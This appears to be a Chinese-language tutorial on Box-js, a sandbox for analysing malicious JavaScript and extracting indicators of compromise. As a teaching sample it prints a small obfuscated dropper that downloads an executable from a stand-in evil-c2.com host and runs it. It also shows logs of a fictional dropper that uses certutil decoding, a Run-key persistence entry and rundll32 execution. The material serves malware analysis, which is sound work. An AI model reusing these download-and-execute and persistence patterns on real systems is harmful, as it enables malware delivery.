1. 项目概述为什么我们需要一个专门的恶意JS分析工具如果你在安全分析、威胁情报或者恶意软件研究领域待过一段时间肯定会遇到一个让人头疼的玩意儿恶意的JavaScript。它可能藏在钓鱼邮件的附件里潜伏在恶意广告的代码中或者伪装成某个正常网站的脚本。这些脚本往往经过层层混淆和加密直接扔到浏览器里运行要么行为诡异难以捕捉要么干脆因为环境不对而“装死”。手动去静态分析面对一堆eval、String.fromCharCode和\x61\x62\x63这样的编码眼睛都要看花了。这时候一个能“沙箱”里自动运行、并帮你把底裤都扒出来的工具就显得无比珍贵。Box-js就是这样一个为安全分析师量身定制的强大工具。简单来说Box-js是一个用于分析可疑JavaScript文件的沙箱。它的核心能力在于模拟一个Windows JScript主要是WSHWindows Script Host环境让恶意脚本“以为”自己正在一个真实的Windows机器上执行从而诱使其暴露出真实意图。它会记录下脚本尝试进行的一切“小动作”比如向哪个C2服务器发起网络请求、试图在磁盘上创建或读取什么文件、调用了哪些可疑的API甚至能尝试对混淆的代码进行一定程度的去混淆。最终它会生成一份详尽的分析报告里面包含了提取出的IOC失陷指标如URL、域名、IP地址、文件路径等为后续的威胁狩猎和事件响应提供直接线索。我最初接触Box-js是在分析一批钓鱼活动时那些.js附件看起来人畜无害但直觉告诉我没那么简单。手动跟踪了几个小时进展缓慢。直到用了Box-js它几乎在几秒钟内就吐出了脚本试图连接的恶意域名和下载的Payload路径效率提升不是一点半点。对于恶意软件分析师、应急响应工程师甚至是渗透测试人员用于分析某些钓鱼载荷来说这绝对是一个值得放进工具箱的利器。2. 核心原理与架构拆解它如何“欺骗”恶意脚本要理解Box-js的强大首先得明白它面对的是什么以及它是如何工作的。恶意JavaScript尤其是在Windows环境下活跃的经常依赖于特定的宿主环境对象比如WScript、ActiveXObject、FileSystemObject等。这些对象在浏览器中不存在但在WSH环境下是标配。攻击者利用这些对象来实现文件操作、执行命令、进行网络通信等高级恶意功能。2.1 环境模拟构建一个“楚门的世界”Box-js的核心魔法在于环境模拟。它并不是真的启动一个Windows系统或完整的WSH引擎而是在Node.js环境下用JavaScript重新实现或者说“模拟”了这些关键对象和方法。当恶意脚本尝试调用new ActiveXObject(Scripting.FileSystemObject)时Box-js提供的模拟对象会接住这个调用并记录下“哦它想操作文件系统”。同样对于WScript.Shell、XMLHTTP等对象的调用也会被拦截和记录。这种模拟是高度可控的。Box-js可以决定是简单地记录这个行为还是更进一步模拟一个成功的返回比如当脚本尝试读取一个文件时返回一个模拟的文件内容或者模拟一个失败以观察脚本的错误处理逻辑。这种灵活性对于触发恶意脚本的各个执行分支至关重要。2.2 行为监控与日志记录记下每一笔“账”光有模拟环境还不够关键是要能看清脚本做了什么。Box-js内置了全面的行为监控模块文件系统操作监控记录所有对FileSystemObject、ADODB.Stream等对象的调用包括文件/文件夹的创建、读取、写入、删除以及具体的路径和内容如果可能。网络活动监控记录通过XMLHTTP、WinHttp.WinHttpRequest甚至某些自定义的ActiveXObject发起的HTTP/HTTPS请求包括URL、方法、请求头和响应可配置是否实际发出请求。进程与命令执行监控记录通过WScript.Shell.Run或Exec方法尝试执行的命令和程序。注册表操作监控模拟并记录对注册表的读写操作尽管在真实分析中恶意JS直接操作注册表的情况相对文件系统少一些。内存与字符串操作跟踪这是Box-js的一个亮点。它会跟踪eval、Function构造函数、setTimeout/Interval等动态代码执行并尝试捕获传入的代码字符串。对于常见的字符串混淆技术如数组拼接、fromCharCode、unescape等它会尝试进行静态或动态的去混淆将可读的字符串还原出来。所有这些监控到的行为都会被实时记录到一个结构化的日志中。分析结束后Box-js会将这些日志整理成人类可读的文本报告和机器可读的JSON报告。2.3 静态分析与动态执行的结合Box-js的工作流程通常是混合式的预处理与静态提取首先它会快速扫描脚本尝试静态提取一些明显的字符串、URL和可能的IOC。这一步很快但可能漏掉经过复杂混淆的内容。沙箱动态执行然后在模拟环境中执行脚本。这是核心步骤旨在触发脚本的恶意逻辑。Box-js会尝试模拟不同的条件如不同的Windows版本、存在/不存在某些文件来覆盖更多代码路径。后期处理与报告生成执行完毕后整合静态和动态分析的结果去重、归类生成最终报告。这种结合方式大大提高了分析的覆盖率和准确性。我遇到过一些脚本静态看只是一堆乱码但在Box-js的沙箱里跑一下它自己就把解密后的代码通过eval执行了而Box-js正好捕获了eval的参数于是核心恶意载荷就浮出了水面。3. 实战部署与快速上手理论说得再多不如亲手跑一个。Box-js的部署非常灵活你可以根据习惯选择不同的方式。3.1 环境准备与安装Box-js基于Node.js所以首先确保你的系统安装了Node.js建议版本12以上和npm。方法一通过npm全局安装最推荐这是最简单快捷的方式安装后可以在任何目录使用box-js命令。npm install -g box-js安装完成后直接在终端输入box-js --help如果看到帮助信息说明安装成功。方法二通过Docker运行环境隔离如果你不想污染主机环境或者需要批量分析Docker是更好的选择。Box-js提供了官方镜像。# 拉取最新镜像 docker pull nmalcolm/box-js # 运行一个简单分析将本地恶意脚本目录挂载到容器的/samples docker run -it --rm -v $(pwd)/samples:/samples nmalcolm/box-js /samples/suspicious.js使用Docker时注意文件路径的映射。所有需要分析的样本文件都需要通过-v参数挂载到容器内部。方法三直接从GitHub克隆用于开发或深度定制如果你想研究源码或贡献代码可以克隆仓库。git clone https://github.com/CapacitorSet/box-js.git cd box-js npm install # 之后可以使用 ./box-js.js 来运行工具注意由于Box-js会在分析过程中模拟网络请求和文件操作虽然它默认是“安全模式”不真正发起网络请求不真正写入文件但在分析未知的极度危险的脚本时仍建议在隔离的虚拟机或专用分析环境中运行。永远不要在生产环境或存有重要数据的个人电脑上直接分析高危样本。3.2 第一个分析案例解剖一个简单的混淆脚本让我们用一个经典的、经过轻度混淆的示例来感受一下Box-js的威力。假设我们有一个名为phish.js的文件内容如下var _0x1a2b[\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21,\x68\x74\x74\x70\x73\x3a\x2f\x2f\x65\x76\x69\x6c\x2d\x63\x32\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x2e\x65\x78\x65]; (function(_0x2d8f05, _0x1a2b3c){ var _0x4c6d8afunction(_0x5cfa28){ while(--_0x5cfa28){ _0x2d8f05[push](_0x2d8f05[shift]()); } }; _0x4c6d8a(_0x1a2b3c); }(_0x1a2b, 0x1a7)); var _0x4c6dfunction(_0x2d8f05, _0x1a2b3c){ _0x2d8f05_0x2d8f05-0x0; var _0x4c6d8a_0x1a2b[_0x2d8f05]; return _0x4c6d8a; }; var msg_0x4c6d(0x0); var url_0x4c6d(0x1); WScript.Echo(msg); var xhrnew ActiveXObject(Microsoft.XMLHTTP); xhr.open(GET, url, false); xhr.send(); if(xhr.status200){ var fsonew ActiveXObject(Scripting.FileSystemObject); var filefso.CreateTextFile(C:\\Users\\Public\\payload.exe, true); file.Write(xhr.responseBody); file.Close(); WScript.Shell.Run(C:\\Users\\Public\\payload.exe, 0); }肉眼看去这是一堆十六进制转义字符和奇怪的数组操作。我们使用Box-js来分析它。步骤1基础分析在终端中进入样本所在目录运行box-js phish.js --output-dir ./analysis_results--output-dir参数指定了分析结果输出的目录。步骤2查看输出命令执行后Box-js会在./analysis_results目录下生成一系列文件phish.js.results.json: 结构化的JSON报告包含所有提取的IOC和行为记录。phish.js._analysis.txt: 人类可读的详细分析日志。可能还会有一些以.js结尾的文件这些是Box-js在分析过程中捕获或解混淆出来的中间代码片段。打开phish.js._analysis.txt你会看到类似这样的内容已简化[INFO] Analysis started on phish.js [STRING] Extracted: Hello, World! [STRING] Extracted: https://evil-c2.com/payload.exe [API] Called: WScript.Echo(Hello, World!) [NETWORK] HTTP Request: GET https://evil-c2.com/payload.exe [FILE] Attempt to create file: C:\Users\Public\payload.exe [FILE] Attempt to write to file: C:\Users\Public\payload.exe [PROCESS] Attempt to execute: C:\Users\Public\payload.exe看无需我们手动解码那些\x48\x65\x6c\x6c\x6f...Box-js已经自动将其还原为Hello, World!和关键的恶意URLhttps://evil-c2.com/payload.exe。同时它清晰地列出了脚本的行为链显示一个迷惑性的消息 - 从C2服务器下载Payload - 将Payload写入磁盘 - 执行它。一份清晰的攻击流程图瞬间就在我们脑中形成了。步骤3深入查看JSON报告JSON报告更适合自动化处理。用文本编辑器或jq工具查看phish.js.results.json你会找到结构化的数据如{ urls: [https://evil-c2.com/payload.exe], domains: [evil-c2.com], ips: [], files: [C:\\Users\\Public\\payload.exe], strings: [Hello, World!, https://evil-c2.com/payload.exe], behavior: [ { type: network, method: GET, url: https://evil-c2.com/payload.exe }, { type: filesystem, action: write, path: C:\\Users\\Public\\payload.exe } ] }这些数据可以直接导入到SIEM安全信息与事件管理系统、威胁情报平台或自定义的脚本中进行进一步的关联分析和预警。4. 高级功能与深度使用技巧掌握了基础用法后Box-js还有一些高级参数和技巧能让你在复杂场景下游刃有余。4.1 关键命令行参数解析Box-js提供了丰富的命令行选项来定制分析行为。以下是一些最常用和最重要的参数--download谨慎使用。此参数会让Box-js真正发起脚本中检测到的网络请求并下载资源。这在你需要获取后续Payload进行分析时非常有用但务必确保在可控的隔离环境中进行避免对真实网络造成影响或触犯法律。box-js suspicious.js --download --output-dir ./results使用--download后下载的文件会保存在输出目录的downloads子文件夹中。--no-network与--no-filesystem完全禁用网络或文件系统模拟。当你想专注于分析脚本的字符串解密逻辑或者样本尝试连接已失效的C2导致分析卡住时可以使用这些参数。box-js spam.js --no-network # 只分析不模拟任何网络请求--timeout设置单个样本的分析超时时间单位秒。默认是30秒。对于特别复杂或陷入死循环的脚本可以适当调低对于需要长时间解密的可以调高。box-js complex_obfuscated.js --timeout 120--analyse-uri直接分析一个URL指向的JavaScript文件无需先下载。box-js --analyse-uri https://malicious-domain.com/script.js--proxy通过指定的HTTP代理来发起--download时的请求这在企业环境或需要隐藏分析源IP时有用。box-js sample.js --download --proxy http://proxy.company.com:8080--debug输出更详细的调试信息当分析结果不符合预期或工具出现问题时用于排查。4.2 批量分析与自动化集成在实际威胁分析中我们很少只面对一个样本。Box-js非常适合批量处理。简单的文件夹批量分析# 分析某个文件夹下的所有.js、.jse、.vbs等文件 box-js ./malware_samples/* --output-dir ./batch_results结合find命令进行过滤# 查找并分析过去24小时内新增的js文件 find ./quarantine -name *.js -mtime -1 -exec box-js {} --output-dir ./daily_analysis \;自动化集成示例Python脚本你可以写一个简单的Python脚本来调用Box-js解析其JSON输出并实现自动化的IOC提取和上报。import json import os import subprocess from pathlib import Path def analyze_with_boxjs(file_path, output_base_dir): sample_name Path(file_path).stem output_dir Path(output_base_dir) / sample_name output_dir.mkdir(parentsTrue, exist_okTrue) # 运行 box-js cmd [box-js, file_path, --output-dir, str(output_dir)] try: result subprocess.run(cmd, capture_outputTrue, textTrue, timeout60) # 可以在这里检查result.returncode和result.stderr except subprocess.TimeoutExpired: print(f分析 {file_path} 超时) return None # 读取生成的JSON报告 json_report_path output_dir / f{Path(file_path).name}.results.json if json_report_path.exists(): with open(json_report_path, r, encodingutf-8) as f: report json.load(f) return report else: print(f未找到报告文件: {json_report_path}) return None # 使用示例 report analyze_with_boxjs(./samples/evil.js, ./analysis_output) if report: print(f提取到URL: {report.get(urls, [])}) print(f提取到域名: {report.get(domains, [])}) # 可以将这些IOC发送到威胁情报平台或SIEM4.3 处理顽固的混淆与反分析技巧高级的恶意脚本会采用各种反分析、反沙箱技术。Box-js虽然强大但并非万能。以下是一些常见挑战及应对思路环境探测与沙箱检测有些脚本会检查navigator.userAgent在WSH中不存在、检查运行时间如果太快就退出、检查磁盘大小或内存等。Box-js的模拟环境可能被探测到。应对Box-js本身对此类检测的对抗能力有限。可以尝试结合更全面的沙箱系统如Cuckoo Sandbox它提供了完整的虚拟机环境或者手动修补样本代码绕过检测点。时间延迟与逻辑炸弹脚本可能使用WScript.Sleep或循环等待很长时间或者只在特定日期触发。应对使用--timeout参数防止无限等待。对于日期检查可以尝试修改系统时间在虚拟机中或者使用调试器修改内存中的日期判断结果。多层嵌套与动态解密混淆可能有多层每一层解密出下一层的代码。应对Box-js的eval捕获功能通常能很好地处理这种情况。关注输出目录中那些额外的.js文件它们往往是层层剥离后的核心代码。有时需要手动将中间解密出的代码再次喂给Box-js分析。依赖外部资源脚本的核心解密密钥或Payload可能来自一个网络请求如果请求失败比如用了--no-network脚本就停止。应对第一次分析时使用--download获取资源。如果资源已失效可以尝试在本地搭建一个简单的HTTP服务器如python -m http.server并使用hosts文件或代理将恶意域名指向本地然后提供一个模拟的响应文件。实操心得没有哪个工具能解决100%的问题。Box-js是一个出色的“首轮打击”工具。对于它无法直接解密的超级顽固样本我的工作流通常是Box-js快速分析 - 提取关键函数和字符串 - 使用静态分析工具如IDA Pro、Ghidra虽然它们主要针对二进制但查看JS混淆逻辑也有帮助或动态调试利用Node.js调试器或浏览器开发者工具手动执行解密函数进行深度逆向。Box-js至少能帮你定位到关键代码块节省大量盲目搜索的时间。5. 分析报告解读与IOC提炼实战Box-js生成的报告是其价值的最终体现。学会高效地解读报告才能将分析成果转化为实际行动。5.1 解剖一份完整的分析报告我们以一个更复杂的虚拟样本trojan_dropper.js的分析报告为例。在输出目录中我们主要关注两个文件.results.json和._analysis.txt。首先看._analysis.txt它按时间顺序记录了所有事件[INFO] Starting analysis of trojan_dropper.js [STRING] Extracted (static): http://api.ipify.org // 可能是用于获取外网IP的环境探测 [STRING] Extracted (static): error [OBFUSCATION] Detected array-based obfuscation. [DEOBFUSC] Deobfuscated string: Software\\Microsoft\\Windows\\CurrentVersion\\Run [DEOBFUSC] Deobfuscated string: rundll32.exe [DEOBFUSC] Deobfuscated string: http://cdn.malware-dist.com/update.dll [API] WScript.Sleep(30000) // 睡眠30秒可能是反沙箱 [NETWORK] HTTP Request: GET http://api.ipify.org [NETWORK] Response received (simulated): 192.168.1.100 // Box-js模拟的响应 [NETWORK] HTTP Request: GET http://cdn.malware-dist.com/update.dll [FILE] Created file: C:\Users\Public\Documents\helper.dat // 第一阶段下载的文件 [API] Shell.Exec(cmd /c certutil -decode C:\Users\...\helper.dat C:\Users\...\temp.dll) // 使用certutil解码一种常见的技术 [FILE] Created file: C:\Users\Public\Documents\temp.dll [REGISTRY] Write to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run - C:\Windows\System32\rundll32.exe C:\Users\...\temp.dll,Start [PROCESS] Execute: rundll32.exe C:\Users\...\temp.dll,Start从这份日志我们可以清晰地重构攻击链脚本启动先睡眠30秒规避沙箱。尝试访问api.ipify.org探测公网IP可能是环境检查或上报信息。从恶意CDN下载一个经过编码的Payloadupdate.dll保存为helper.dat。使用系统自带的certutil工具常用于编解码对helper.dat进行解码得到真正的DLL文件temp.dll。将temp.dll通过rundll32.exe的方式设置为当前用户的开机自启动项。立即执行该DLL完成驻留。接下来查看trojan_dropper.js.results.json获取结构化的IOC数据{ version: 1.0, sample: trojan_dropper.js, analysis_time: 45.2, iocs: { urls: [ http://api.ipify.org/, http://cdn.malware-dist.com/update.dll ], domains: [ api.ipify.org, cdn.malware-dist.com ], ips: [], // 如果实际解析了域名这里可能会有IP hashes: { md5: {}, sha1: {}, sha256: {} }, // 如果使用了--download这里会有下载文件的哈希 files: [ C:\\Users\\Public\\Documents\\helper.dat, C:\\Users\\Public\\Documents\\temp.dll ], registry: [ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ] }, behavior: [ {type: network, method: GET, url: http://api.ipify.org/}, {type: network, method: GET, url: http://cdn.malware-dist.com/update.dll}, {type: filesystem, action: create, path: C:\\Users\\Public\\Documents\\helper.dat}, {type: process, command: cmd /c certutil -decode ...}, {type: filesystem, action: create, path: C:\\Users\\Public\\Documents\\temp.dll}, {type: registry, action: write, path: HKCU\\...\\Run, data: C:\\Windows\\System32\\rundll32.exe C:\\Users\\...\\temp.dll,Start}, {type: process, command: rundll32.exe C:\\Users\\...\\temp.dll,Start} ], strings: [ Software\\Microsoft\\Windows\\CurrentVersion\\Run, rundll32.exe, http://cdn.malware-dist.com/update.dll, error, http://api.ipify.org ] }5.2 从报告到行动IOC的利用拿到这份报告后安全团队可以立即展开行动封锁与检测网络层立即在防火墙、IPS、Web网关等设备上封锁域名cdn.malware-dist.com和URLhttp://api.ipify.org/虽然后者是合法服务但在此上下文可疑。检查是否有内网主机向该域名发起了连接。终端层在全网终端上搜索文件路径C:\Users\Public\Documents\helper.dat和temp.dll以及检查注册表项HKCU\Software\Microsoft\Windows\CurrentVersion\Run下是否有可疑的rundll32.exe调用。部署对应的文件哈希如果获取到检测规则。威胁狩猎以certutil -decode作为命令行参数特征在EDR或终端日志中搜索历史记录看是否有其他主机存在类似可疑行为。将提取的域名cdn.malware-dist.com提交到VirusTotal等威胁情报平台查看其信誉和关联的其他恶意样本。丰富情报库将本次分析提取的所有IOCURL、域名、文件路径、注册表路径、行为模式录入内部威胁情报平台用于丰富检测规则和自动化剧本。逆向与关联如果使用了--download并成功获取了update.dll可以对这个DLL进行进一步的静态和动态分析可能发现更庞大的恶意软件家族。注意事项Box-js提取的IOC需要谨慎验证。例如脚本中可能硬编码了一些无关的或用于误导的字符串如合法的云服务URL。需要结合行为上下文来判断。像api.ipify.org本身是合法服务但在此处被用于环境探测应视为可疑行为指标IOB而非直接的恶意IOC。而cdn.malware-dist.com这种明显恶意的域名则是高置信度的IOC。6. 常见问题排查与效能优化即使是最好的工具在实际使用中也会遇到各种问题。下面是我在长期使用Box-js过程中积累的一些常见问题解决方法和优化技巧。6.1 典型错误与解决方案问题现象可能原因解决方案分析过程卡住长时间无输出1. 脚本包含长时间循环或sleep。2. 脚本在等待一个永远不会返回的网络请求。3. 遇到了Box-js未完美模拟的API导致死循环。1. 使用--timeout 10设置一个较短的超时时间先获取部分结果。2. 使用--no-network参数禁用网络模拟避免等待。3. 检查分析日志的最后几行看卡在哪个API调用上尝试寻找并手动修改样本绕过该调用。报告显示“No interesting behaviour found”1. 样本是良性的。2. 样本有强环境检测在Box-js沙箱中未执行恶意代码。3. 样本依赖特定文件或资源沙箱中不存在。1. 用其他工具如VirusTotal交叉验证。2. 尝试不同的参数组合如去掉--no-network或使用--debug查看更详细的执行流。3. 在样本目录下放置其可能依赖的假文件如特定的.txt、.dat文件再重新分析。Node.js 内存溢出错误 (JavaScript heap out of memory)分析的脚本非常复杂或包含巨大数组/字符串耗尽了Node.js默认内存。在运行box-js命令前设置Node.js堆内存大小NODE_OPTIONS--max-old-space-size4096 box-js sample.js(设置为4GB)Docker容器中运行报错“Cannot find module”Docker镜像版本问题或容器内路径映射错误。1. 确保使用最新镜像docker pull nmalcolm/box-js2. 检查-v参数映射的宿主主机路径是否正确容器内路径是否可写。提取的字符串仍是乱码或混淆状态Box-js的去混淆模块未能成功处理该种混淆方式。1. 查看输出目录中是否有额外的.js文件可能是中间解密状态。2. 手动分析代码寻找解密函数。有时只需在Node.js REPL中复制关键的解密函数并执行就能得到明文。3. 结合使用其他专门的反混淆工具如javascript-deobfuscator等。6.2 提升分析效能的技巧建立标准化分析流程为不同类型的JS样本钓鱼邮件附件、网页挂马、恶意广告建立标准的Box-js命令行参数模板。例如对于邮件附件第一轮总是用box-js sample.js --no-network --timeout 30快速筛查对于网页脚本可能加上--download来获取后续资源。与其它工具联动形成管道前端使用邮件网关、Web代理自动剥离JS附件并送入一个共享文件夹。分析中使用像inotifywaitLinux或File System WatcherWindows监控文件夹一旦有新文件自动触发一个脚本调用Box-js进行分析。后端分析脚本自动解析Box-js的JSON报告将高置信度IOC自动提交到防火墙或SIEM进行封堵并发送分析摘要邮件给安全团队。维护自定义模拟库对于某些经常出现但Box-js默认模拟不完善的特定ActiveX对象或函数可以研究Box-js的源码在src/emulation/目录下添加或修改对应的模拟模块。这需要一定的JavaScript和Node.js功底但对于应对特定家族的恶意软件非常有效。结果可视化Box-js的JSON报告可以很容易地导入到如Elastic Stack、Splunk等平台。利用这些平台的可视化能力可以制作仪表盘展示每天分析的样本数量、发现的顶级恶意域名、最常见的恶意行为如持久化方式等让威胁态势一目了然。注意样本的“保质期”恶意脚本尤其是用于钓鱼的其内嵌的C2地址可能很快失效。分析时如果发现网络请求失败不要轻易断定样本无害。应重点观察其行为模式如是否尝试写启动项、是否使用certutil解码和代码混淆手法这些特征往往比具体的IOC存活得更久也更具威胁情报价值。工具终究是工具Box-js极大地提升了我们分析恶意JavaScript的效率和深度但它不能替代分析师的思考和判断。它输出的是一份“行为日志”和“IOC列表”而将这些点连成线勾勒出攻击者的全貌和意图才是安全分析师真正的价值所在。每次分析完成后不妨多问自己几个问题这个脚本的最终目标是什么它试图窃取什么它的传播方式是什么有没有我还没发现的、更隐蔽的后备机制通过Box-js打开这扇门门后的世界需要你用自己的经验和知识去探索。